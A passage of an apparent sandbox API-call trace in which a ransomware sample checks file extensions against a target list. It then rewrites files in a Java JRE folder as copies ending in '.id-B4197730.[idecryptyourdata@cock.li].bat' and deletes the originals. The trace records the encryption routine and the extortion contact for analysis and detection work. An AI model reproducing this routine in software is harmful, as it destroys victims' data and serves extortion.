lstrcmpiW (lpString1=".dbf", lpString2=".txt") returned -1 [0056.903] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt") returned 56 [0056.903] lstrlenW (lpString=".1cd") returned 4 [0056.903] lstrcmpiW (lpString1=".1cd", lpString2=".txt") returned -1 [0056.903] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt") returned 56 [0056.903] lstrlenW (lpString=".jpg") returned 4 [0056.903] lstrcmpiW (lpString1=".jpg", lpString2=".txt") returned -1 [0056.903] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt") returned 56 [0056.903] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt") returned 56 [0056.903] lstrlenW (lpString=".doc") returned 4 [0056.903] lstrcmpiW (lpString1=".doc", lpString2=".txt") returned -1 [0056.903] lstrlenW (lpString=".docx") returned 5 [0056.903] lstrcmpiW (lpString1=".docx", lpString2="e.txt") returned -1 [0056.903] lstrlenW (lpString=".pdf") returned 4 [0056.903] lstrcmpiW (lpString1=".pdf", lpString2=".txt") returned -1 [0056.903] lstrlenW (lpString=".xls") returned 4 [0056.903] lstrcmpiW (lpString1=".xls", lpString2=".txt") returned 1 [0056.903] lstrlenW (lpString=".xlsx") returned 5 [0056.903] lstrcmpiW (lpString1=".xlsx", lpString2="e.txt") returned -1 [0056.903] lstrlenW (lpString=".ppt") returned 4 [0056.903] lstrcmpiW (lpString1=".ppt", lpString2=".txt") returned -1 [0056.903] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt") returned 56 [0056.904] lstrlenW (lpString=".zip") returned 4 [0056.904] lstrcmpiW (lpString1=".zip", lpString2=".txt") returned 1 [0056.904] lstrlenW (lpString=".rar") returned 4 [0056.904] lstrcmpiW (lpString1=".rar", lpString2=".txt") returned -1 [0056.904] lstrlenW (lpString=".bz2") returned 4 [0056.904] lstrcmpiW (lpString1=".bz2", lpString2=".txt") returned -1 [0056.904] lstrlenW (lpString=".7z") returned 3 [0056.904] lstrcmpiW (lpString1=".7z", lpString2="txt") returned -1 [0056.904] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt") returned 56 [0056.904] lstrlenW (lpString=".dbf") returned 4 [0056.904] lstrcmpiW (lpString1=".dbf", lpString2=".txt") returned -1 [0056.904] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt") returned 56 [0056.904] lstrlenW (lpString=".1cd") returned 4 [0056.904] lstrcmpiW (lpString1=".1cd", lpString2=".txt") returned -1 [0056.904] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt") returned 56 [0056.904] lstrlenW (lpString=".jpg") returned 4 [0056.904] lstrcmpiW (lpString1=".jpg", lpString2=".txt") returned -1 [0056.904] lstrcmpiW (lpString1=".gif", lpString2=".bat") returned 1 [0056.904] lstrlenW (lpString="splash.gif") returned 10 [0056.904] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0056.906] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=8590) returned 1 [0056.906] CloseHandle (hObject=0x344) returned 1 [0056.906] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash.gif")) returned 0x20 [0056.906] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash.gif.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0056.907] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0056.907] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0056.907] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0056.907] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0056.911] GetLastError () returned 0x0 [0056.911] ReadFile (in: hFile=0x344, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x218e, lpOverlapped=0x0) returned 1 [0056.938] WriteFile (in: hFile=0x350, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x2190, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x2190, lpOverlapped=0x0) returned 1 [0056.939] ReadFile (in: hFile=0x344, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0056.939] WriteFile (in: hFile=0x350, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xe8, lpOverlapped=0x0) returned 1 [0056.939] SetEndOfFile (hFile=0x350) returned 1 [0056.939] CloseHandle (hObject=0x350) returned 1 [0056.940] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0056.940] SetEndOfFile (hFile=0x344) returned 1 [0056.941] CloseHandle (hObject=0x344) returned 1 [0056.941] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0056.941] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash.gif")) returned 1 [0056.941] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif") returned 56 [0056.941] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif") returned 56 [0056.941] lstrlenW (lpString=".doc") returned 4 [0056.941] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0056.941] lstrlenW (lpString=".docx") returned 5 [0056.942] lstrcmpiW (lpString1=".docx", lpString2="h.gif") returned -1 [0056.942] lstrlenW (lpString=".pdf") returned 4 [0056.942] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0056.942] lstrlenW (lpString=".xls") returned 4 [0056.942] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0056.942] lstrlenW (lpString=".xlsx") returned 5 [0056.942] lstrcmpiW (lpString1=".xlsx", lpString2="h.gif") returned -1 [0056.942] lstrlenW (lpString=".ppt") returned 4 [0056.942] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0056.942] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif") returned 56 [0056.942] lstrlenW (lpString=".zip") returned 4 [0056.942] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0056.942] lstrlenW (lpString=".rar") returned 4 [0056.942] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0056.942] lstrlenW (lpString=".bz2") returned 4 [0056.942] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0056.942] lstrlenW (lpString=".7z") returned 3 [0056.942] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0056.942] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif") returned 56 [0056.942] lstrlenW (lpString=".dbf") returned 4 [0056.942] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0056.942] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif") returned 56 [0056.942] lstrlenW (lpString=".1cd") returned 4 [0056.942] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0056.942] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif") returned 56 [0056.942] lstrlenW (lpString=".jpg") returned 4 [0056.942] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0056.942] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif") returned 56 [0056.942] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif") returned 56 [0056.942] lstrlenW (lpString=".doc") returned 4 [0056.942] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0056.942] lstrlenW (lpString=".docx") returned 5 [0056.942] lstrcmpiW (lpString1=".docx", lpString2="h.gif") returned -1 [0056.942] lstrlenW (lpString=".pdf") returned 4 [0056.943] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0056.943] lstrlenW (lpString=".xls") returned 4 [0056.943] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0056.943] lstrlenW (lpString=".xlsx") returned 5 [0056.943] lstrcmpiW (lpString1=".xlsx", lpString2="h.gif") returned -1 [0056.943] lstrlenW (lpString=".ppt") returned 4 [0056.943] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0056.943] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif") returned 56 [0056.943] lstrlenW (lpString=".zip") returned 4 [0056.943] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0056.943] lstrlenW (lpString=".rar") returned 4 [0056.943] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0056.943] lstrlenW (lpString=".bz2") returned 4 [0056.943] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0056.943] lstrlenW (lpString=".7z") returned 3 [0056.943] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0056.943] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif") returned 56 [0056.943] lstrlenW (lpString=".dbf") returned 4 [0056.943] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0056.943] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif") returned 56 [0056.943] lstrlenW (lpString=".1cd") returned 4 [0056.943] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0056.943] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif") returned 56 [0056.943] lstrlenW (lpString=".jpg") returned 4 [0056.943] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0056.943] lstrcmpiW (lpString1=".gif", lpString2=".bat") returned 1 [0056.943] lstrlenW (lpString="invalid32x32.gif") returned 16 [0056.943] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0056.944] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=153) returned 1 [0056.944] CloseHandle (hObject=0x344) returned 1 [0056.944] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif")) returned 0x20 [0056.944] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0056.944] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0056.945] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0056.945] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0056.945] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0056.945] GetLastError () returned 0x0 [0056.945] ReadFile (in: hFile=0x344, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x99, lpOverlapped=0x0) returned 1 [0056.946] WriteFile (in: hFile=0x350, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xa0, lpOverlapped=0x0) returned 1 [0056.946] ReadFile (in: hFile=0x344, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0056.947] WriteFile (in: hFile=0x350, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xf4, lpOverlapped=0x0) returned 1 [0056.947] SetEndOfFile (hFile=0x350) returned 1 [0056.947] CloseHandle (hObject=0x350) returned 1 [0056.947] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0056.947] SetEndOfFile (hFile=0x344) returned 1 [0056.948] CloseHandle (hObject=0x344) returned 1 [0056.948] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0056.949] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif")) returned 1 [0056.949] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif") returned 70 [0056.949] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif") returned 70 [0056.949] lstrlenW (lpString=".doc") returned 4 [0056.949] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0056.949] lstrlenW (lpString=".docx") returned 5 [0056.949] lstrcmpiW (lpString1=".docx", lpString2="2.gif") returned -1 [0056.949] lstrlenW (lpString=".pdf") returned 4 [0056.949] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0056.949] lstrlenW (lpString=".xls") returned 4 [0056.949] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0056.949] lstrlenW (lpString=".xlsx") returned 5 [0056.949] lstrcmpiW (lpString1=".xlsx", lpString2="2.gif") returned -1 [0056.949] lstrlenW (lpString=".ppt") returned 4 [0056.949] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0056.949] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif") returned 70 [0056.949] lstrlenW (lpString=".zip") returned 4 [0056.949] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0056.949] lstrlenW (lpString=".rar") returned 4 [0056.949] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0056.949] lstrlenW (lpString=".bz2") returned 4 [0056.949] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0056.949] lstrlenW (lpString=".7z") returned 3 [0056.949] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0056.949] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif") returned 70 [0056.949] lstrlenW (lpString=".dbf") returned 4 [0056.949] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0056.949] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif") returned 70 [0056.949] lstrlenW (lpString=".1cd") returned 4 [0056.949] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0056.950] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif") returned 70 [0056.950] lstrlenW (lpString=".jpg") returned 4 [0056.950] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0056.950] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif") returned 70 [0056.950] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif") returned 70 [0056.950] lstrlenW (lpString=".doc") returned 4 [0056.950] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0056.950] lstrlenW (lpString=".docx") returned 5 [0056.950] lstrcmpiW (lpString1=".docx", lpString2="2.gif") returned -1 [0056.950] lstrlenW (lpString=".pdf") returned 4 [0056.950] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0056.950] lstrlenW (lpString=".xls") returned 4 [0056.950] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0056.950] lstrlenW (lpString=".xlsx") returned 5 [0056.950] lstrcmpiW (lpString1=".xlsx", lpString2="2.gif") returned -1 [0056.950] lstrlenW (lpString=".ppt") returned 4 [0056.950] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0056.950] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif") returned 70 [0056.950] lstrlenW (lpString=".zip") returned 4 [0056.950] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0056.950] lstrlenW (lpString=".rar") returned 4 [0056.950] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0056.950] lstrlenW (lpString=".bz2") returned 4 [0056.950] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0056.950] lstrlenW (lpString=".7z") returned 3 [0056.950] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0056.950] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif") returned 70 [0056.950] lstrlenW (lpString=".dbf") returned 4 [0056.950] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0056.950] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif") returned 70 [0056.950] lstrlenW (lpString=".1cd") returned 4 [0056.950] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0056.950] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif") returned 70 [0056.950] lstrlenW (lpString=".jpg") returned 4 [0056.950] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0056.951] lstrcmpiW (lpString1=".gif", lpString2=".bat") returned 1 [0056.951] lstrlenW (lpString="win32_CopyDrop32x32.gif") returned 23 [0056.951] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_copydrop32x32.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0056.951] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=165) returned 1 [0056.951] CloseHandle (hObject=0x344) returned 1 [0056.951] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_copydrop32x32.gif")) returned 0x20 [0056.951] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_copydrop32x32.gif.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0056.952] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_copydrop32x32.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0056.952] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0056.952] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0056.952] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_copydrop32x32.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0056.952] GetLastError () returned 0x0 [0056.952] ReadFile (in: hFile=0x344, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0xa5, lpOverlapped=0x0) returned 1 [0056.954] WriteFile (in: hFile=0x350, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xb0, lpOverlapped=0x0) returned 1 [0056.955] ReadFile (in: hFile=0x344, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0056.955] WriteFile (in: hFile=0x350, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x102, lpOverlapped=0x0) returned 1 [0056.955] SetEndOfFile (hFile=0x350) returned 1 [0056.955] CloseHandle (hObject=0x350) returned 1 [0056.956] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0056.956] SetEndOfFile (hFile=0x344) returned 1 [0056.956] CloseHandle (hObject=0x344) returned 1 [0056.956] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0056.957] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_copydrop32x32.gif")) returned 1 [0056.957] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif") returned 77 [0056.957] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif") returned 77 [0056.957] lstrlenW (lpString=".doc") returned 4 [0056.957] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0056.957] lstrlenW (lpString=".docx") returned 5 [0056.957] lstrcmpiW (lpString1=".docx", lpString2="2.gif") returned -1 [0056.957] lstrlenW (lpString=".pdf") returned 4 [0056.957] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0056.957] lstrlenW (lpString=".xls") returned 4 [0056.957] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0056.957] lstrlenW (lpString=".xlsx") returned 5 [0056.957] lstrcmpiW (lpString1=".xlsx", lpString2="2.gif") returned -1 [0056.957] lstrlenW (lpString=".ppt") returned 4 [0056.957] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0056.957] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif") returned 77 [0056.957] lstrlenW (lpString=".zip") returned 4 [0056.957] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0056.957] lstrlenW (lpString=".rar") returned 4 [0056.957] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0056.958] lstrlenW (lpString=".bz2") returned 4 [0056.958] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0056.958] lstrlenW (lpString=".7z") returned 3 [0056.958] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0056.958] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif") returned 77 [0056.958] lstrlenW (lpString=".dbf") returned 4 [0056.958] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0056.958] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif") returned 77 [0056.958] lstrlenW (lpString=".1cd") returned 4 [0056.958] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0056.958] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif") returned 77 [0056.958] lstrlenW (lpString=".jpg") returned 4 [0056.958] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0056.958] lstrlenW (lpString="C:\\Program 